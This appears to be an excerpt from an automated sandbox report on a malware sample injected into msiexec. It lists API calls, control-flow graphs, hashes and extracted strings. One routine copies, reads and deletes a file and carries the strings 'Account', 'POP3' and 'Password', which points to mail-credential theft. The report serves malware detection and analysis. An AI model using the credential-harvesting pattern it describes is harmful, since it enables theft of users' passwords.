                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 254C61E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 254C61F1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 6539e80468352fb411a7401bc7af78e100a16ae5dc2be88e9b79c375a7b1f8c4
                                                              • Instruction ID: 58f9afc776b394e00919084334595f1add9b37daf5638025cf241cc64f81e234
                                                              • Opcode Fuzzy Hash: 6539e80468352fb411a7401bc7af78e100a16ae5dc2be88e9b79c375a7b1f8c4
                                                              • Instruction Fuzzy Hash: D131E77491121C9BCB25DF28D988B8DFBB4BF48711F5041EAE81CA7250EB74AF818F45
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,254C4A8A,?,254D2238,0000000C,254C4BBD,00000000,00000000,?,254C2082,254D2108,0000000C,254C1F3A,?), ref: 254C4AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,254C4A8A,?,254D2238,0000000C,254C4BBD,00000000,00000000,?,254C2082,254D2108,0000000C,254C1F3A,?), ref: 254C4ADC
                                                              • ExitProcess.KERNEL32 ref: 254C4AEE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 9c385de9840e8fb63d6cdabe54603c34b44669ce02d60705ce5449fbe8d19126
                                                              • Instruction ID: 143e2cdd9c413c84b770a15ee40c3784165beb51b147f83dc53815cc2494ac53
                                                              • Opcode Fuzzy Hash: 9c385de9840e8fb63d6cdabe54603c34b44669ce02d60705ce5449fbe8d19126
                                                              • Instruction Fuzzy Hash: 9EE0BF39110244AFCF05AF59CE08E49BB69FF80747B904094F90557221DF3AED53CA54
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 8041f63af2e1baad41a848ba71e1960d63094d8432e79e630ad1c2f2d1cdc545
                                                              • Instruction ID: db59b13c46936380316f4f4d3ffd01c5f193d598122cc5b9b90bb260c7eef4f6
                                                              • Opcode Fuzzy Hash: 8041f63af2e1baad41a848ba71e1960d63094d8432e79e630ad1c2f2d1cdc545
                                                              • Instruction Fuzzy Hash: 96A012302211028F430C4F35420960CB5ACA64119D300401C5408C0004EF2888004604

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 254C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D1B
                                                                • Part of subcall function 254C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 254C1D37
                                                                • Part of subcall function 254C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D4B
                                                              • _strlen.LIBCMT ref: 254C1855
                                                              • _strlen.LIBCMT ref: 254C1869
                                                              • _strlen.LIBCMT ref: 254C188B
                                                              • _strlen.LIBCMT ref: 254C18AE
                                                              • _strlen.LIBCMT ref: 254C18C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: e3aa3380c742002727dce8499f72c31a4c9c89178764ba5747d4b71058849d70
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: F9612879E04618ABEF11CBA4C840BDEF7B9AFA5602F5050DAD204AB350EB707A45CF56

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 18a8a6e99ab98aec61df06bd0c746938699a66f50059f6b3e49c24404d03c18b
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: 32713A75E046285BCB11DBB4CC84ADFBBFCAF95A02F6000DAD544D3241EA74E745CBA4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 254c7cc2-254c7cd6 204 254c7cd8-254c7cdd 203->204 205 254c7d44-254c7d4c 203->205 204->205 208 254c7cdf-254c7ce4 204->208 206 254c7d4e-254c7d51 205->206 207 254c7d93-254c7dab call 254c7e35 205->207 206->207 209 254c7d53-254c7d90 call 254c571e * 4 206->209 215 254c7dae-254c7db5 207->215 208->205 211 254c7ce6-254c7ce9 208->211 209->207 211->205 214 254c7ceb-254c7cf3 211->214 216 254c7d0d-254c7d15 214->216 217 254c7cf5-254c7cf8 214->217 219 254c7dd4-254c7dd8 215->219 220 254c7db7-254c7dbb 215->220 222 254c7d2f-254c7d43 call 254c571e * 2 216->222 223 254c7d17-254c7d1a 216->223 217->216 221 254c7cfa-254c7d0c call 254c571e call 254c90ba 217->221 230 254c7dda-254c7ddf 219->230 231 254c7df0-254c7dfc 219->231 225 254c7dbd-254c7dc0 220->225 226 254c7dd1 220->226 221->216 222->205 223->222 228 254c7d1c-254c7d2e call 254c571e call 254c91b8 223->228 225->226 234 254c7dc2-254c7dd0 call 254c571e * 2 225->234 226->219 228->222 238 254c7ded 230->238 239 254c7de1-254c7de4 230->239 231->215 233 254c7dfe-254c7e0b call 254c571e 231->233 234->226 238->231 239->238 247 254c7de6-254c7dec call 254c571e 239->247 247->238
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 254C7D06
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C90D7
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C90E9
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C90FB
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C910D
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C911F
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C9131
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C9143
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C9155
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C9167
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C9179
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C918B
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C919D
                                                                • Part of subcall function 254C90BA: _free.LIBCMT ref: 254C91AF
                                                              • _free.LIBCMT ref: 254C7CFB
                                                                • Part of subcall function 254C571E: HeapFree.KERNEL32(00000000,00000000,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?), ref: 254C5734
                                                                • Part of subcall function 254C571E: GetLastError.KERNEL32(?,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?,?), ref: 254C5746
                                                              • _free.LIBCMT ref: 254C7D1D
                                                              • _free.LIBCMT ref: 254C7D32
                                                              • _free.LIBCMT ref: 254C7D3D
                                                              • _free.LIBCMT ref: 254C7D5F
                                                              • _free.LIBCMT ref: 254C7D72
                                                              • _free.LIBCMT ref: 254C7D80
                                                              • _free.LIBCMT ref: 254C7D8B
                                                              • _free.LIBCMT ref: 254C7DC3
                                                              • _free.LIBCMT ref: 254C7DCA
                                                              • _free.LIBCMT ref: 254C7DE7
                                                              • _free.LIBCMT ref: 254C7DFF
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: a9b5f9b6f0f8f7f08a075b4513d60e0458d1dfe150439eb8f2eef8a3e8902478
                                                              • Instruction ID: bfd3eb00d3f187e255a8465cfa23e9e1317aa0ec1ff6abc5973c4c81c94116db
                                                              • Opcode Fuzzy Hash: a9b5f9b6f0f8f7f08a075b4513d60e0458d1dfe150439eb8f2eef8a3e8902478
                                                              • Instruction Fuzzy Hash: BB314E39605204DFEB219A38D980FAAF7EABF80652F2044DDE959D7251DE31B980C710

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 254C59EA
                                                                • Part of subcall function 254C571E: HeapFree.KERNEL32(00000000,00000000,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?), ref: 254C5734
                                                                • Part of subcall function 254C571E: GetLastError.KERNEL32(?,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?,?), ref: 254C5746
                                                              • _free.LIBCMT ref: 254C59F6
                                                              • _free.LIBCMT ref: 254C5A01
                                                              • _free.LIBCMT ref: 254C5A0C
                                                              • _free.LIBCMT ref: 254C5A17
                                                              • _free.LIBCMT ref: 254C5A22
                                                              • _free.LIBCMT ref: 254C5A2D
                                                              • _free.LIBCMT ref: 254C5A38
                                                              • _free.LIBCMT ref: 254C5A43
                                                              • _free.LIBCMT ref: 254C5A51
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 2e6a200fc7e6948502b474fcc7cbf3371877715926432764876b9f0dc60043a3
                                                              • Instruction ID: 0ae7d32cc1716058d1348ea290a63b3e4275251cde918d6385a7bf7371ca85a3
                                                              • Opcode Fuzzy Hash: 2e6a200fc7e6948502b474fcc7cbf3371877715926432764876b9f0dc60043a3
                                                              • Instruction Fuzzy Hash: 2F11D77E211148EFCB11EF54C880CDEBFA5EF54651F1540D9B9088F220DA31EE909B80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 254caa53-254caa6e 288 254caa80 287->288 289 254caa70-254caa7e RtlDecodePointer 287->289 290 254caa85-254caa8b 288->290 289->290 291 254caa91 290->291 292 254cabb2-254cabb5 290->292 293 254caba6 291->293 294 254caa97-254caa9a 291->294 295 254cabb7-254cabba 292->295 296 254cac12 292->296 297 254caba8-254cabad 293->297 298 254cab47-254cab4a 294->298 299 254caaa0 294->299 301 254cabbc-254cabbf 295->301 302 254cac06 295->302 300 254cac19 296->300 303 254cac5b-254cac6a call 254c2ada 297->303 309 254cab4c-254cab4f 298->309 310 254cab9d-254caba4 298->310 304 254cab34-254cab42 299->304 305 254caaa6-254caaab 299->305 306 254cac20-254cac49 300->306 307 254cabfa 301->307 308 254cabc1-254cabc4 301->308 302->296 304->306 313 254caaad-254caab0 305->313 314 254cab25-254cab2f 305->314 334 254cac4b-254cac50 call 254c6368 306->334 335 254cac56-254cac59 306->335 307->302 315 254cabee 308->315 316 254cabc6-254cabc9 308->316 317 254cab94-254cab9b 309->317 318 254cab51-254cab54 309->318 312 254cab61-254cab8f 310->312 312->335 320 254cab1c-254cab23 313->320 321 254caab2-254caab5 313->321 314->306 315->307 323 254cabcb-254cabd0 316->323 324 254cabe2 316->324 317->300 318->303 325 254cab5a 318->325 326 254caac7-254caaf7 320->326 327 254cab0d-254cab17 321->327 328 254caab7-254caaba 321->328 329 254cabdb-254cabe0 323->329 330 254cabd2-254cabd5 323->330 324->315 325->312 326->335 341 254caafd-254cab08 call 254c6368 326->341 327->306 328->303 332 254caac0 328->332 329->297 330->303 330->329 332->326 334->335 335->303 341->335
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 2862f88047185925d2a977ebceed0da74637a38d5923a1a4521b7d0a7ee3d422
                                                              • Instruction ID: ab4e34f3ee281336f83e7963fead457b38f9f0a733ebc0e8f1c459ba0ddc31e8
                                                              • Opcode Fuzzy Hash: 2862f88047185925d2a977ebceed0da74637a38d5923a1a4521b7d0a7ee3d422
                                                              • Instruction Fuzzy Hash: 67519F79904509CBDB04CFA6D5889DCFBB1FB8D212F2442C7D682A7354DB36AE24CB14

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 254C1D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C1D8A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 545a329318db415c009f5d1412abbce9299c006e8b110bc0868eb0448bb10f62
                                                              • Instruction ID: c2846937a0ba60977f85e4a101b865dc2130afe4a632df17f3cc3b03f584f51f
                                                              • Opcode Fuzzy Hash: 545a329318db415c009f5d1412abbce9299c006e8b110bc0868eb0448bb10f62
                                                              • Instruction Fuzzy Hash: BA214CB5A0121CAFD710DFA5CC8CEEBF6ACFB9874AF4005A9F501D2140DE74AE468A70

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 361 254c9492-254c94ef GetConsoleCP 362 254c94f5-254c9511 361->362 363 254c9632-254c9644 call 254c2ada 361->363 365 254c952c-254c953d call 254c7c19 362->365 366 254c9513-254c952a 362->366 373 254c953f-254c9542 365->373 374 254c9563-254c9565 365->374 368 254c9566-254c9575 call 254c79e6 366->368 368->363 375 254c957b-254c959b WideCharToMultiByte 368->375 376 254c9548-254c955a call 254c79e6 373->376 377 254c9609-254c9628 373->377 374->368 375->363 378 254c95a1-254c95b7 WriteFile 375->378 376->363 383 254c9560-254c9561 376->383 377->363 381 254c95b9-254c95ca 378->381 382 254c962a-254c9630 GetLastError 378->382 381->363 384 254c95cc-254c95d0 381->384 382->363 383->375 385 254c95fe-254c9601 384->385 386 254c95d2-254c95f0 WriteFile 384->386 385->362 388 254c9607 385->388 386->382 387 254c95f2-254c95f6 386->387 387->363 389 254c95f8-254c95fb 387->389 388->363 389->385
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,254C9C07,?,00000000,?,00000000,00000000), ref: 254C94D4
                                                              • __fassign.LIBCMT ref: 254C954F
                                                              • __fassign.LIBCMT ref: 254C956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 254C9590
                                                              • WriteFile.KERNEL32(?,?,00000000,254C9C07,00000000,?,?,?,?,?,?,?,?,?,254C9C07,?), ref: 254C95AF
                                                              • WriteFile.KERNEL32(?,?,?,254C9C07,00000000,?,?,?,?,?,?,?,?,?,254C9C07,?), ref: 254C95E8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: e5c35af2ceb1968f389dd959e24156f81c2aa2b43e8d820298ab2947b33a5d33
                                                              • Instruction ID: 9987d4698e3b97e20e08ff65b770018896784083359b2583e62ccd093c8288b7
                                                              • Opcode Fuzzy Hash: e5c35af2ceb1968f389dd959e24156f81c2aa2b43e8d820298ab2947b33a5d33
                                                              • Instruction Fuzzy Hash: 43519E75A04249AFDB00CFA8C891FEEFBF8FB49311F10419AE551E7281DA30B941CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 254c3370-254c33b5 call 254c3330 call 254c37a7 395 254c3416-254c3419 390->395 396 254c33b7-254c33c9 390->396 397 254c3439-254c3442 395->397 398 254c341b-254c3428 call 254c3790 395->398 396->397 399 254c33cb 396->399 402 254c342d-254c3436 call 254c3330 398->402 401 254c33d0-254c33e7 399->401 403 254c33fd 401->403 404 254c33e9-254c33f7 call 254c3740 401->404 402->397 405 254c3400-254c3405 403->405 412 254c340d-254c3414 404->412 413 254c33f9 404->413 405->401 408 254c3407-254c3409 405->408 408->397 411 254c340b 408->411 411->402 412->402 414 254c33fb 413->414 415 254c3443-254c344c 413->415 414->405 416 254c344e-254c3455 415->416 417 254c3486-254c3496 call 254c3774 415->417 416->417 419 254c3457-254c3466 call 254cbbe0 416->419 423 254c3498-254c34a7 call 254c3790 417->423 424 254c34aa-254c34c6 call 254c3330 call 254c3758 417->424 425 254c3468-254c3480 419->425 426 254c3483 419->426 423->424 425->426 426->417
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 254C339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 254C33A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 254C3431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 254C345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 254C34B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 143a7c33a8f1079c71e1f0544b5e58a4cbd4b62a4f702d493ddad89a587b9b80
                                                              • Instruction ID: c008265873dc8a02791526d659b47310788b8ab70a68b03f351daf920e03aeee
                                                              • Opcode Fuzzy Hash: 143a7c33a8f1079c71e1f0544b5e58a4cbd4b62a4f702d493ddad89a587b9b80
                                                              • Instruction Fuzzy Hash: E941D838A242489BCB01CF68C84499EFBB5BFC522EF14C1D9D9159B351DB35BE01CB99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 254C9221: _free.LIBCMT ref: 254C924A
                                                              • _free.LIBCMT ref: 254C92AB
                                                                • Part of subcall function 254C571E: HeapFree.KERNEL32(00000000,00000000,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?), ref: 254C5734
                                                                • Part of subcall function 254C571E: GetLastError.KERNEL32(?,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?,?), ref: 254C5746
                                                              • _free.LIBCMT ref: 254C92B6
                                                              • _free.LIBCMT ref: 254C92C1
                                                              • _free.LIBCMT ref: 254C9315
                                                              • _free.LIBCMT ref: 254C9320
                                                              • _free.LIBCMT ref: 254C932B
                                                              • _free.LIBCMT ref: 254C9336
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 6ba4f76fa49c5f0a426c586f071b3738aff549f390046aa0b1a74eae32f9c64e
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: E211B439641B08FAD524E7B0CC85FDBFB9DAF94B11F400C6CA6DE76052DA24B6404741

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 254c5351-254c535e 473 254c537b-254c53c7 call 254c571e * 4 472->473 474 254c5360-254c536c 472->474 474->473 475 254c536e-254c5375 call 254c571e 474->475 475->473
                                                              APIs
                                                              • _free.LIBCMT ref: 254C536F
                                                                • Part of subcall function 254C571E: HeapFree.KERNEL32(00000000,00000000,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?), ref: 254C5734
                                                                • Part of subcall function 254C571E: GetLastError.KERNEL32(?,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?,?), ref: 254C5746
                                                              • _free.LIBCMT ref: 254C5381
                                                              • _free.LIBCMT ref: 254C5394
                                                              • _free.LIBCMT ref: 254C53A5
                                                              • _free.LIBCMT ref: 254C53B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: /Z
                                                              • API String ID: 776569668-566627793
                                                              • Opcode ID: d77c3950d46f501f6db5ce979ffc1b2cfb72e25368963c19934c20dc9b3f96f9
                                                              • Instruction ID: 95f372e567dee015cd9e13e5b291c19a08c6931d62a9c6e6d7fe609dfdcca1e9
                                                              • Opcode Fuzzy Hash: d77c3950d46f501f6db5ce979ffc1b2cfb72e25368963c19934c20dc9b3f96f9
                                                              • Instruction Fuzzy Hash: 36F0B4B8937124DB860DAF24D5D0C4DFBB1F755A7A345028EF81493314DF781C418B80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 486 254c8821-254c883a 487 254c883c-254c884c call 254c9341 486->487 488 254c8850-254c8855 486->488 487->488 498 254c884e 487->498 489 254c8857-254c885f 488->489 490 254c8862-254c8886 MultiByteToWideChar 488->490 489->490 492 254c888c-254c8898 490->492 493 254c8a19-254c8a2c call 254c2ada 490->493 495 254c88ec 492->495 496 254c889a-254c88ab 492->496 502 254c88ee-254c88f0 495->502 499 254c88ad-254c88bc call 254cbf20 496->499 500 254c88ca-254c88db call 254c56d0 496->500 498->488 505 254c8a0e 499->505 513 254c88c2-254c88c8 499->513 500->505 514 254c88e1 500->514 502->505 506 254c88f6-254c8909 MultiByteToWideChar 502->506 508 254c8a10-254c8a17 call 254c8801 505->508 506->505 507 254c890f-254c892a call 254c5f19 506->507 507->505 518 254c8930-254c8937 507->518 508->493 517 254c88e7-254c88ea 513->517 514->517 517->502 519 254c8939-254c893e 518->519 520 254c8971-254c897d 518->520 519->508 521 254c8944-254c8946 519->521 522 254c897f-254c8990 520->522 523 254c89c9 520->523 521->505 524 254c894c-254c8966 call 254c5f19 521->524 526 254c89ab-254c89bc call 254c56d0 522->526 527 254c8992-254c89a1 call 254cbf20 522->527 525 254c89cb-254c89cd 523->525 524->508 539 254c896c 524->539 530 254c89cf-254c89e8 call 254c5f19 525->530 531 254c8a07-254c8a0d call 254c8801 525->531 526->531 538 254c89be 526->538 527->531 542 254c89a3-254c89a9 527->542 530->531 544 254c89ea-254c89f1 530->544 531->505 543 254c89c4-254c89c7 538->543 539->505 542->543 543->525 545 254c8a2d-254c8a33 544->545 546 254c89f3-254c89f4 544->546 547 254c89f5-254c8a05 WideCharToMultiByte 545->547 546->547 547->531 548 254c8a35-254c8a3c call 254c8801 547->548 548->508
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,254C6FFD,00000000,?,?,?,254C8A72,?,?,00000100), ref: 254C887B
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,254C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 254C8901
